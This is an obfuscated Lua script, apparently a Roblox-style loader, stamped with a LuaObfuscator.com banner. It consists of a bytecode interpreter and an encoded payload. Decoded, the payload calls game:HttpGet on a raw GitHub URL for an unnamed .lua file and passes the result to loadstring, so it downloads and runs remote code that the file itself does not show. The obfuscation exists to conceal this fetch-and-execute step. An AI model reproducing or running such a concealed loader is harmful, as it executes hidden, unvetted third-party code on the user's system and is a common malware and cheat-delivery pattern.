--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v78=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v78,v19);v19=nil;v87=1;end end else return v78;end end end);local function v20(v31,v32,v33) if v33 then local v79=(v31/((929 -(214 + 713))^(v32-((118 -(32 + 85)) + 0))))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + (878 -(282 + 595)))) ;return v79-(v79%((2 + 0) -1)) ;else local v80=(621 -(555 + 64))^(v32-(932 -(857 + (322 -248)))) ;return (((v31%(v80 + v80))>=v80) and (1066 -(68 + 222 + 775))) or (568 -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v40 * (30800116 -14022900)) + (v39 * (48056 + 17480)) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 + 0 ,79 -59 ) * (((2998 -2044) -(802 + 150))^(85 -53))) + v41 ;local v45=v20(v42,21,55 -24 );local v46=((v20(v42,24 + 8 )==(998 -(915 + 82))) and  -((20 -(10 + 8)) -1)) or (1 + 0) ;if (v45==(0 -0)) then if (v44==(1187 -(1069 + 118))) then return v46 * (0 -0) ;else v45=(3 -2) -0 ;v43=(442 -(416 + 26)) + 0 ;end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * (1/0))) or (v46 * NaN) ;end return v8(v46,v45-(1015 + 8) ) * (v43 + (v44/(((2531 -1738) -(368 + 423))^52))) ;end local function v25(v47) local v48=0 + 0 ;local v49;local v50;while true do if (v48==(1 -0)) then v49=v3(v16,v18,(v18 + v47) -(439 -(145 + 104 + 189)) );v18=v18 + v47 ;v48=432 -(44 + 386) ;end if (v48==(2 + 0)) then v50={};for v89=1487 -(998 + 488) , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=3;end if (v48==(0 + 0)) then v49=nil;if  not v47 then local v99=0 + 0 ;while true do if (v99==(859 -(814 + (930 -(261 + 624))))) then v47=v23();if (v47==((0 -0) -0)) then return "";end break;end end end v48=1;end if (v48==(775 -(201 + 571))) then return v6(v50);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if ((2 + 0)~=v51) then else for v91= #"!",v23() do local v92=(function() return v21();end)();if (v20(v92, #">", #"|")==0) then local v102=(function() return 1700 -(1419 + 281) ;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if ((701 -(271 + 429))~=v102) then else local v107=(function() return 0 + 0 ;end)();while true do if (v107~=(0 -0)) then else v105=(function() return nil;end)();v106=(function() return nil;end)();v107=(function() return 1087 -(461 + 625) ;end)();end if ((1289 -(993 + 295))~=v107) then else v102=(function() return 1 + 1 ;end)();break;end end end if (v102==(74 -(71 + 3))) then local v108=(function() return 0;end)();while true do if (v108==(1 + 0)) then v102=(function() return 2 -1 ;end)();break;end if ((0 -0)==v108) then v103=(function() return 241 -(187 + 54) ;end)();v104=(function() return nil;end)();v108=(function() return 1;end)();end end end if ((782 -(162 + 618))==v102) then while true do if (v103~=(2 + 0)) then else local v119=(function() return 1769 -(1749 + 20) ;end)();local v120=(function() return;end)();while true do if (v119~=(0 + 0)) then else v120=(function() return 1322 -(1249 + 73) ;end)();while true do if (v120==0) then if (v20(v105, #"~", #"[")== #",") then v106[1 + 1 ]=(function() return v57[v106[2 + 0 ]];end)();end if (v20(v105,4 -2 ,3 -1 )~= #"[") then else v106[ #"19("]=(function() return v57[v106[ #"xxx"]];end)();end v120=(function() return 1;end)();end if (v120==1) then v103=(function() return  #"xnx";end)();break;end end break;end end end if (v103~= #"}") then else local v121=(function() return 1900 -(106 + 1794) ;end)();local v122=(function() return;end)();while true do if ((0 + 0)~=v121) then else v122=(function() return 0 -0 ;end)();while true do if (v122~=(1 + 0)) then else v103=(function() return 1 + 1 ;end)();break;end if (v122~=(1636 -(1373 + 263))) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v168=(function() return 0 -0 ;end)();local v169=(function() return;end)();while true do if (v168~=(0 + 0)) then else v169=(function() return 0 -0 ;end)();while true do if (v169==0) then v106[ #"xxx"]=(function() return v22();end)();v106[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v104== #"{") then v106[ #"19("]=(function() return v23();end)();elseif (v104==(2 -0)) then v106[ #"xxx"]=(function() return v23() -((1386 -(746 + 638))^(7 + 9)) ;end)();elseif (v104== #"xnx") then local v174=(function() return 584 -(57 + 527) ;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 0 -0 ;end)();while true do if (v175==0) then v106[ #"nil"]=(function() return v23() -(2^(357 -(218 + 123))) ;end)();v106[ #"0836"]=(function() return v22();end)();break;end end break;end end end v122=(function() return 1;end)();end end break;end end end if (v103==0) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123==(1581 -(1535 + 46))) then v124=(function() return 0 + 0 ;end)();while true do if (v124==(1 + 0)) then v103=(function() return  #"|";end)();break;end if (v124~=(103 -(17 + 86))) then else v104=(function() return v20(v92,2 + 0 , #"xxx");end)();v105=(function() return v20(v92, #".com",566 -(306 + 254) );end)();v124=(function() return 1;end)();end end break;end end end if (v103~= #"-19") then else if (v20(v105, #"gha", #"xxx")== #"|") then v106[ #"?id="]=(function() return v57[v106[ #"asd1"]];end)();end v52[v91]=(function() return v106;end)();break;end end break;end end end end for v93= #"|",v23() do v53[v93-#"]" ]=(function() return v28();end)();end return v55;end if ( #"<"~=v51) then else local v83=(function() return 0 + 0 ;end)();local v84=(function() return;end)();while true do if (v83~=(0 -0)) then else v84=(function() return 1467 -(899 + 568) ;end)();while true do if (v84==(0 + 0)) then v56=(function() return v23();end)();v57=(function() return {};end)();v84=(function() return 2 -1 ;end)();end if (v84==(604 -(268 + 335))) then for v110= #" ",v56 do local v111=(function() return 0;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==0) then local v126=(function() return 0;end)();while true do if ((0 -0)==v126) then v112=(function() return 0;end)();v113=(function() return nil;end)();v126=(function() return 3 -2 ;end)();end if ((291 -(60 + 230))~=v126) then else v111=(function() return 1 + 0 ;end)();break;end end end if (v111~=(1 + 0)) then else v114=(function() return nil;end)();while true do if ( #"]"~=v112) then else if (v113== #"}") then v114=(function() return v21()~=(0 -0) ;end)();elseif (v113==(574 -(426 + 146))) then v114=(function() return v24();end)();elseif (v113== #"nil") then v114=(function() return v25();end)();end v57[v110]=(function() return v114;end)();break;end if (v112==(65 -(30 + 35))) then local v159=(function() return 0 + 0 ;end)();while true do if (v159==(1258 -(1043 + 214))) then v112=(function() return  #"[";end)();break;end if (v159==(0 + 0)) then v113=(function() return v21();end)();v114=(function() return nil;end)();v159=(function() return 1457 -(282 + 1174) ;end)();end end end end break;end end end v55[ #"xnx"]=(function() return v21();end)();v84=(function() return 813 -(569 + 242) ;end)();end if ((5 -3)~=v84) then else v51=(function() return 1214 -(323 + 889) ;end)();break;end end break;end end end if (v51==0) then local v85=(function() return 0 + 0 ;end)();local v86=(function() return;end)();while true do if (v85==0) then v86=(function() return 1024 -(706 + 318) ;end)();while true do if (v86==(582 -(361 + 219))) then v51=(function() return  #":";end)();break;end if (v86==(321 -(53 + 267))) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v86=(function() return 2;end)();end if (v86~=0) then else v52=(function() return {};end)();v53=(function() return {};end)();v86=(function() return 1272 -(945 + 326) ;end)();end end break;end end end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[2];local v63=v58[1 + 2 ];return function(...) local v64=v61;local v65=v62;local v66=v63;local v67=v27;local v68=414 -(15 + 398) ;local v69= -(983 -(18 + 802 + 162));local v70={};local v71={...};local v72=v12("#",...) -(217 -(42 + 174)) ;local v73={};local v74={};for v81=0 + 0 ,v72 do if ((v81>=v66) or (4782==1275)) then v70[v81-v66 ]=v71[v81 + 1 + 0 ];else v74[v81]=v71[v81 + (851 -(20 + (1715 -885))) ];end end local v75=(v72-v66) + 1 + 0 ;local v76;local v77;while true do local v82=126 -(116 + 10) ;while true do if ((v82==(2 -1)) or (796>=3791)) then if (v77<=(1 + 5)) then if (v77<=2) then if (v77<=(738 -(542 + 196))) then v74[v76[1977 -((5686 -3773) + 62) ]]=v60[v76[6 -3 ]];elseif (v77>(1 + 0)) then v74[v76[2 + 0 ]]();else v74[v76[1 + 1 ]]=v76[7 -4 ];end elseif (v77<=(9 -5)) then if (v77==((1208 -(902 + 303)) -0)) then local v129=(3405 -1854) -(1126 + 425) ;local v130;local v131;local v132;local v133;while true do if (v129==(856 -(564 + 292))) then v130=v76[407 -(118 + 287) ];v131,v132=v67(v74[v130](v13(v74,v130 + (3 -2) ,v76[1124 -(118 + 1003) ])));v129=2 -1 ;end if (v129==(378 -(142 + 235))) then v69=(v132 + v130) -(4 -3) ;v133=1001 -(938 + 63) ;v129=1 + 1 ;end if (v129==(979 -(553 + 424))) then for v163=v130,v69 do v133=v133 + (1 -0) ;v74[v163]=v131[v133];end break;end end else do return;end end elseif ((v77==((4 -2) + 3)) or (569>=1591)) then v74[v76[1 + 1 + (1690 -(1121 + 569)) ]]();else local v134=v76[2 + 0 ];v74[v134]=v74[v134](v13(v74,v134 + (1139 -(782 + 356)) ,v69));end elseif (v77<=(9 + 0)) then if ((v77<=(17 -10)) or (4490<=89)) then v74[v76[2 + 0 ]]=v76[1095 -(975 + 117) ];elseif (v77==((2097 -(22 + 192)) -((840 -(483 + 200)) + 1718))) then local v136=v76[1 + 1 ];local v137,v138=v67(v74[v136](v13(v74,v136 + 1 + 0 ,v76[3 + 0 ])));v69=(v138 + v136) -(3 -2) ;local v139=(1463 -(1404 + 59)) -0 ;for v155=v136,v69 do v139=v139 + (2 -1) ;v74[v155]=v137[v139];end else local v140=v76[4 -2 ];local v141=v74[v76[1021 -(697 + (878 -557)) ]];v74[v140 + 1 + 0 ]=v141;v74[v140]=v141[v76[19 -15 ]];end elseif (v77<=(764 -(239 + 514))) then if (v77>((4 -0) + 6)) then do return;end else local v145=v76[1331 -(797 + 532) ];local v146=v74[v76[5 -2 ]];v74[v145 + 1 + 0 ]=v146;v74[v145]=v146[v76[(767 -(468 + 297)) + 2 ]];end elseif (v77==(27 -15)) then v74[v76[1204 -(373 + 829) ]]=v60[v76[734 -(476 + 255) ]];else local v152=1130 -(369 + 761) ;local v153;while true do if ((v152==(0 + (562 -(334 + 228)))) or (4983<1808)) then v153=v76[1 + (3 -2) ];v74[v153]=v74[v153](v13(v74,v153 + (1 -0) ,v69));break;end end end v68=v68 + (1 -0) ;break;end if ((3829>3769) and (v82==(238 -(64 + 174)))) then v76=v64[v68];v77=v76[1 + 0 ];v82=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F536372697074732F726566732F68656164732F6D61696E2F32393332392Q6532613065336165313433323435323433652E6C756100083Q00120C3Q00013Q00120C000100023Q00200A000100010003001207000300044Q0008000100034Q00065Q00022Q00023Q000100012Q00043Q00017Q00",v9(),...);
